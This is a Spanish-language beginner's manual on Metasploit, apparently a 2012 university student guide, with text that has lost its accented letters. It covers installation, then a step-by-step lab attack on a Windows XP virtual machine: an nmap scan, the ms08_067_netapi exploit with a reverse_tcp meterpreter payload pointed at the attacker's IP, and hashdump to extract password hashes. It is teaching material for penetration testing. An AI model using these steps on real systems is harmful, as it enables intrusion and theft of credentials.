guía básica metasploit
DESCRIPTION
MANUAL BÁSICO DEL USO DE METASPLOITFRAMEWORK EN UBUNTU 12.10TRANSCRIPT
-
MANUAL BSICO DEL USO DE METASPLOIT FRAMEWORK EN UBUNTU 12.10
William Caldern y Javier SenzUniversidad Nacional de Colombia
2012
CONTENIDO
1. DEFINICIONES2. INSTALACIN3. ACTUALIZACIN3. INTERFACES4. ATAQUE Y OPCIONES5. CONCLUSIONES
1. DEFINICIONES
METASPLOIT
Es una herramienta de software abierto de seguridad informtica para el desarrollo, pruebas, mejora y penetracin a diversos sistemas operativos,
Metasploit se ejecuta bajo una consola CYGWIN y trabaja con una base de datos en la cual se encuentran toda la lista de exploits y vulnerabilidades, lo nico que tenemos que indicarle a metasploit es que vulnerabilidad utilizaremos, que sistema atacaremos, que tipo de ataque utilizaremos y datos diversos que utilizar para atacar al host.
Se llama Metasploit Framework por que es todo un entorno de pruebas para diversas plataformas, la cual trabaja con libreras, bases de datos, y diversos programas, shell codes, etc. Por tal deja de ser un simple software si no un framework.
PEN-TESTING
Un Penetration Testing o Test de Penetracin, es un procedimiento metodolgico y sistemtico en el que se simula un ataque real a una red o sistema, con el fin de descubrir y reparar sus problemas de seguridad
-
2. INSTALACIN
Descargamos directamente de la pgina oficial el instalador de Metasploit Framework dando click en el siguiente enlace http://www.metasploit.com/download/ y escogiendo la versin 32 bits o 64 bits segn sea el caso.
Vamos a una Terminal y escribimos
chmod +x metasploit-latest-linux-x64-installer.runsudo ./metasploit-latest-linux-x64-installer.run
http://www.metasploit.com/download/
-
3. ACTUALIZACIN
Despus de terminar la instalacin (varios Siguientes y Finalizar) procedemos a actualizar el framework.
De nuevo en la Terminal escribimos
sudo msfupdate
y esperamos a que finalice con
Updated to revision XXXXX.
-
4. INTERFACES
4.1 MODO GUI
Escribimos
sudo msfgui
4.2 MODO CONSOLA
Escribimossudo msfconsole
-
5. ATAQUE Y OPCIONES
Trabajaremos nuestro metasploit por medio de la consola y directamente en un ataque a un Windows XP SP3 instalado como mquina virtual con el firewall desactivado.
Inicialmente y antes de abrir nuestro metasploit debemos escanear nuestra red LAN.
sudo nmap -O 192.168.0.1/24
Tenemos como resultado
Starting Nmap 6.00 ( http://nmap.org ) at 2012-11-29 01:27 COT Nmap scan report for 192.168.0.18 Host is up (0.00050s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds MAC Address: 08:00:27:A2:3F:80 (Cadmus Computer Systems) Device type: general purpose Running: Microsoft Windows XP|2003 OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003 Network Distance: 1 hop Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_nbstat: NetBIOS name: USUARIO-7A1D458, NetBIOS user: , NetBIOS MAC: 08:00:27:a2:3f:80 (Cadmus Computer Systems) |_smbv2-enabled: Server doesn't support SMBv2 protocol | smb-security-mode: | Account that was used for smb scripts: guest | User-level authentication | SMB Security: Challenge/response passwords supported |_ Message signing disabled (dangerous, but default) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | Computer name: usuario-7a1d458 | NetBIOS computer name: USUARIO-7A1D458 | Workgroup: GRUPO_TRABAJO |_ System time: 2012-11-29 01:27:20 UTC-5
TRACEROUTE HOP RTT ADDRESS 1 0.50 ms 192.168.0.18
Como se puede ver, el puerto 445 se encuentra abierto, y existe un exploit que permite hacer uso de este puerto para controlar ese sistema remotamente.
-
Ahora, vamos al METASPLOIT en modo consola
sudo msfconsole
Podemos inicialmente ver la cantidad de exploits existentes en el framework con:
show exploits
Teniendo en cuenta la informacin obtenida con NMAP es bien sabido que el puerto 445 se puede atacar con el exploit ms08_067_netapi. Escribimos
search exploit ms08_067_netapi
Teniendo como resultado el lugar donde se guarda el exploit.
Matching Modules ================
Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
-
Escogemos el exploit
use exploit/windows/smb/ms08_067_netapi
Acto seguido debemos elegir el PAYLOAD (lo que queremos recibir despus de realizar el ataque). Podemos elegir bind shells o reverse shells. Existe tambin el payload llamado METERPRETER (definir).
Para ver los payloads existentesshow payloads
Digitamos el comando para elegir nuestro payload.
set payload windows/meterpreter/reverse_tcp
-
Ahora que informacin especfica requiere el exploit y el payload?
show options
Hace falta RHOST (direccin IP de la vctima) y LHOST (direccin IP del atacante)
Tenemos la IP de la vctima:
-
Definimos entonces
set RHOST 192.168.0.18set LHOST 192.168.0.5
Y ATACAMOS
exploit
Tenemos control de la mquina !!
-
Vemos las diversas opciones de METERPRETER.
meterpreter> help
Por lo que vemos existen muchas opciones, tales como SHELL (obtenemos un CMD de la mquina), HASHDUMP (obtenemos los hash de las claves de usuario del sistema), SCREENSHOT (tomamos un pantallazo de la mquina), entre muchos otros.
SHELL
HASHDUMP
-
IFCONFIG (verificamos que estamos dentro)
5. CONCLUSIONES
Metasploit es una herramienta muy til para realizar diferentes pruebas a un sistema y de esta manera identificar debilidades.
Al ser una herramienta de software libre nos permite realizar modificaciones al cdigo fuente y mantener siempre actualizada la herramienta.
Debido a que es una herramienta de libre acceso se presta para que usuarios malintencionados hagan mal uso de la misma.
Para la realizacin de una auditoria de un sistema se debe realizar inicialmente un Information Gathering para despus saber que ataque realizar. Es necesario decirle a la Metasploit que tipo de ataque usar o de lo contrario no tendr efectividad.